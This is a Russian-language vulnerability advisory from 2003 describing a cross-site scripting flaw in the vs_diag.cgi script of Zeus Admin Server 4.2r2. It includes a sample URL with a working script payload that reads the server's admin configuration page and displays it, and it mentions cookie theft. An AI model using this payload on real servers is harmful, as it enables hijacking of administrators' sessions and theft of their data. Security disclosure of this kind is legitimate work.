| Дата публикации: | 02.06.2003 |
| Всего просмотров: | 2215 |
| Опасность: | |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Описание: | Уязвимость в проверке правильности ввода обнаружена в Zeus Admin Server в 'vs_diag.cgi' сценарии. Удаленный пользователь может выполнить XSS нападение против администратора сервера.
Сообщается, что сценарий 'vs_diag.cgi' не фильтрует HTML код в данных, представленных пользователем. Удаленный пользователь может сконструировать специально обработанный URL, при загрузке которого администратором, выполнится произвольный код сценария в браузере целевого администратора, в контексте безопасности Zeus Admin сервера. Уязвимость может использоваться для кражи опознавательных данных, хранящихся в куки целевого администратора. Пример:
http://<target>:9090/apps/web/vs_diag.cgi?server=<YOUR_CODE>
http://<target>:9090/apps/web/vs_diag.cgi?server=<script>function%20pedo()
{var%20 xmlHttp%20=%20new%20ActiveXObject("Microsoft.XMLHTTP");xmlHttp.open
("GET","http://<target>:9090/apps/web/global.fcgi",false);xmlHttp.send
();xmlDoc=xmlHttp.responseTex t;document.write(xmlDoc);}pedo();alert("Have%
20you%20enabled%20the%20protection%20of%20your%20ZEUS...?%20We%20can%20rip%
20this%20info!%20Much%20more%20evil%20actions% 20are%20possible...")
</script>
Уязвимость обнаружена в Zeus Admin Server 4.2r2
|
| Ссылки: | Another ZEUS Server web admin XSS! |